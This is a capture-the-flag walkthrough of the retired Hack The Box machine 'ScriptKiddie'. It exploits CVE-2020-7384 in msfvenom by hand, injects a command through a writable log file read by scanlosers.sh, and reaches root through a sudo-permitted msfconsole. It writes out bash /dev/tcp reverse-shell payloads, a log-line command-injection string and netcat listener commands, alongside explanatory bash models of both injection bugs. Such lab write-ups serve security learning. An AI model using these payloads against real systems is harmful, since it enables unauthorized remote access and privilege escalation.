ScriptKiddie Walkthrough

Now that ScriptKiddie has been retired, here is a walkthrough for the script kiddies.


As the name implies, this machine is CTF-like. The machine's matrix on the statistics page gives its characteristics.

The overall experience is good. Here I explain how to exploit CVE-2020-7384 without touching the Metasploit Framework at all. Privilege escalation is simple once you understand the shell script involved. Hope you like it.

Enough talk. Let's get started.

Disclaimer: no flags (user/root) are shown in this writeup, as is usual for writeups, so follow the procedure to grab them yourself.


01 Enumeration

First of all I check the status of my VPN connection and whether the machine is alive. To do that, simply ping the IP address:

As you can see, the TTL value is 63. Linux hosts send with a default TTL of 64 and the one router hop (the VPN gateway) decrements it by one, so this is very likely a Linux box. A Windows host would start at 128 and show up as 127.

As usual, let's begin with Nmap. First I need to know which TCP ports are open, so I run a fast scan over all 65535 ports (-n skips DNS resolution, --open hides closed and filtered ports, -T4 speeds up timing):

nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.226

Here is the output:

So there are only two open ports.

01.1 Run Nmap Scripting Engine

To get the most information, run version detection (-sV) and the default Nmap Scripting Engine scripts (-sC) against the open ports only. Now that we know which ports are open, we can point the scripts at just those two, which is much faster than scripting the whole port range.

nmap -sV -sC -oN DetailPorts.nmap -p 22,5000 10.10.10.226

Here is the output:

The SSH service banner tells us the operating system is Ubuntu, and looking up the OpenSSH package version on Launchpad tells us the release is Focal Fossa (20.04). Kind of cute, eh?

You can search for known exploits for this OpenSSH version, but trust me, nothing useful comes up.

That leaves one port, 5000/tcp. According to the Nmap results it is running a web server identified as Werkzeug, the Python WSGI toolkit whose development server Flask applications run on by default.

From the Werkzeug documentation: "Werkzeug is a comprehensive WSGI web application library. It began as a simple collection of various utilities for WSGI applications and has become one of the most advanced WSGI utility libraries."

Since it is a web server, let's browse to it. Use whatever browser you like, but remember that sometimes we need to intercept the web traffic; I use Firefox because I already have it configured with Burp's CA certificate.

Open web browser and navigate to http://10.10.10.226:5000/

One look at the interface tells us there is plenty to enumerate here, isn't there?

After trying a number of things (LFI, SSRF, RCE and so on) I found the foothold.


02. Foothold | Without using MSF

Now we have the gun. Let's load it and shoot.

I neglected to mention what the vulnerability is, so let me introduce CVE-2020-7384. It is a command injection in Metasploit's msfvenom payload generator: when an attacker-supplied APK is used as a template (-x), msfvenom reads the signing certificate out of that APK and pastes fields from it, unescaped, into a shell command. Here is a short description of the vulnerability from Rapid7:

But we are not using Metasploit here. Let's do it manually, OK?
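To see why a mere APK template can run commands, here is an added example that is not part of the original post or of the PoC: a small bash model of the bug class. msfvenom took the dname (the Owner line) of the template APK's signing certificate and interpolated it into a keytool command string that was executed through a shell, so a certificate whose CN closes the quote and starts a pipeline gets that pipeline executed; the PoC builds exactly such a certificate. keytool is replaced by echo so the block runs offline, and the injected command is a harmless echo INJECTED rather than a reverse shell.

```bash
#!/bin/bash
# Added example (not from the original post or the PoC): a model of the CVE-2020-7384
# bug class. msfvenom read the dname (the Owner line) out of the template APK's signing
# certificate and interpolated it, unescaped, into a keytool command string that was run
# through a shell. keytool is replaced by echo here so the block runs offline.

# What a normal Android signing certificate's Owner line looks like.
DNAME_BENIGN='CN=Android Debug,O=Android,C=US'

# Same shape as the PoC's certificate: the leading quote closes the -dname '...' argument,
# "|" starts a pipeline, and "#" comments out whatever keytool options followed.
# The PoC's pipeline is "echo <base64 payload> | base64 -d | sh"; here it is a harmless echo.
DNAME_EVIL="CN='|echo INJECTED #"

# Vulnerable: the dname is spliced into a string that a shell then parses,
# which is what  -dname '#{orig_cert_dname}'  inside a shell-executed string amounts to.
regen_cert_vuln() {
    sh -c "echo keytool -genkey -dname '$1'"
}

# Fixed: the dname travels as one argv element, so no shell ever sees its quotes.
regen_cert_safe() {
    echo keytool -genkey -dname "$1"
}

echo "--- vulnerable, benign cert ---";  regen_cert_vuln "$DNAME_BENIGN"
echo "--- vulnerable, crafted cert ---"; regen_cert_vuln "$DNAME_EVIL"   # prints only INJECTED
echo "--- fixed, crafted cert ---";      regen_cert_safe "$DNAME_EVIL"
```

With the crafted dname the "vulnerable" function never runs keytool at all: the shell sees `echo ... -dname 'CN='` piped into `echo INJECTED`, and the trailing `#` swallows the rest of the line. That is the whole trick the PoC plays on msfvenom, with the payload carried in the certificate instead of on the command line.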

Here is the PoC code for the vulnerability:

justinsteven/advisories

First go to the PoC section of the advisory and copy the script into a file on your attacking machine.

Then read the PoC line by line. It is written in Python 3, and you are not a kiddie, right? Understand what it does and come back.

The script carries the payload as a variable of its own. All we have to do is replace that payload. See how cheap it is?

Now it's time to load the gun, in other words to create the payload. Since we need a reverse shell, I replace the PoC's payload with a bash reverse shell. The inner quotes are backslash-escaped because the line sits inside a double-quoted Python string:

/bin/bash -c \"/bin/bash -i >& /dev/tcp/<YourIP>/4545 0>&1\"

The final exploit looks like this. Remember to replace <YourIP> with your own VPN address.

Let me also introduce my reverse shell generator for HTB; check it out and judge for yourself.

Everything set? Let's run the script. It is written in Python 3, so use python3:

python3 exploit.py

Here we have our loaded weapon.

After you run the exploit, the malicious APK is written under /tmp. I copied it to my Downloads directory because that makes it easy to browse to and select in the file picker; put it in whatever directory you like.

Also, don't forget to start the netcat listener:

nc -lvnp 4545

Now go back to the web browser and to the payload section.

With everything above in place, select the malicious APK as the template and click the generate button. Is netcat listening? Look what we got.


03. Privilege Escalation

First I looked around the .ssh directory. It contains only an authorized_keys file, and it is writable, which means you could create a key pair with ssh-keygen, append the public key to authorized_keys and then log in as the user kid over SSH with your private key for a stable shell. I'm not going to do that here.

After some enumeration I found an interesting script called scanlosers.sh in /home/pwn, owned by the user pwn. Looking at its permissions, we definitely cannot write to that file.

Let's open that file:

I analyzed the script and debugged it line by line. (I copied scanlosers.sh to my own machine and created a local hackers file, then experimented with what I could feed it through that file, because in this scenario the hackers file is the only thing we can write to.) That gave me the exact way to get a reverse shell as the user pwn. Now check the permissions on /home/kid/logs/hackers: as kid we can write anything we like to it.

So here is my payload:

echo "h4rithd  ;/bin/bash -c 'bash -i >& /dev/tcp/<YourIP>/7878 0>&1' #" >> /home/kid/logs/hackers

Note the double space between h4rithd and the ; character. scanlosers.sh splits each log line on single spaces and uses everything from the third field onward as the scan target, so the empty second field is what lands our injected command at the start of that target; the ; ends the nmap command and the trailing # comments out the rest of the line. Again, change <YourIP> to yours. Before executing the command, open a new terminal and start another netcat listener, this time on port 7878:

nc -lvnp 7878

Now execute the payload above and wait for the reverse shell.

But if you are in a busy environment, that is, many users are on the box at the same time as you, the payload may take a while to fire. So go sip some coffee and try again afterwards.
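Why the double space matters, shown as an added example rather than anything from the original post: scanlosers.sh, as I read it on the box (its text is not reproduced on this page, so treat the quoted fragment in the comments as my recollection), cuts each line of the hackers log on single spaces, takes field three onward as the target, and hands it to sh -c inside an nmap command string built by interpolation. The bash below models that pipeline with nmap replaced by echo so it runs anywhere; the marker string INJECTED stands in for the reverse shell.

```bash
#!/bin/bash
# Added example (not from the original post): a model of how scanlosers.sh on the box
# turns one line of /home/kid/logs/hackers into a command. As read on the machine, the
# script does roughly:
#   cat $log | cut -d' ' -f3- | sort -u | while read ip; do
#       sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
#   done
# nmap is swapped for echo below so the block runs offline; the quoted fragment above is
# my recollection of the script, not text reproduced from this page.

# Everything from the third space-separated field onward becomes the "target".
extract_target() {
    printf '%s\n' "$1" | cut -d' ' -f3-
}

# The string the script hands to sh -c, with nmap replaced by echo.
build_cmd() {
    local target
    target=$(extract_target "$1")
    printf 'echo nmap --top-ports 10 -oN recon/%s.nmap %s 2>&1 >/dev/null' "$target" "$target"
}

# Execute the line the way the script does and return whatever reaches stdout.
run_line() {
    sh -c "$(build_cmd "$1")"
}

# Benign line (constructed): the target is a plain IP, the "scan" output goes to /dev/null.
run_line 'a b 10.10.14.5'

# One space: ";echo INJECTED #" is split into fields 2, 3 and 4, so field 3 onward is
# "INJECTED #" and the model merely "scans" a host called INJECTED.
run_line 'h4rithd ;echo INJECTED #'

# Two spaces: field 2 is empty, field 3 onward is ";echo INJECTED #". The ";" ends the
# nmap command and "#" comments out the trailing ".nmap ... 2>&1 >/dev/null", so the
# injected echo (a reverse shell in the real payload) runs.
run_line 'h4rithd  ;echo INJECTED #'
```

Only the last call prints INJECTED on its own line; with a single space the injected text is consumed as the target name, which is why a payload with one space silently does nothing on the box.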

Shortly afterwards we have a reverse shell as the user pwn. If you are familiar with privilege escalation you already know the next command: it is usually sudo -l.

If you don't know sudo well, check explainshell.com; it breaks down any shell command in a very readable way. Here is its explanation of sudo -l:

In short, we are allowed to run /opt/metasploit-framework-6.0.9/msfconsole as root through sudo without being asked for a password. Let's try it. Type the following command and hit enter:

sudo /opt/metasploit-framework-6.0.9/msfconsole

msfconsole passes any command it does not recognise straight to the system shell, and that shell runs as root because the whole process does, so no second sudo is needed. At the msf6 > prompt simply type:

cat /root/root.txt

(Typing /bin/bash at the same prompt drops you into a full root shell.)

Voilà! We got the root flag.

Okay... I'll see you on the next retired machine! Stay connected.

Find me on Twitter.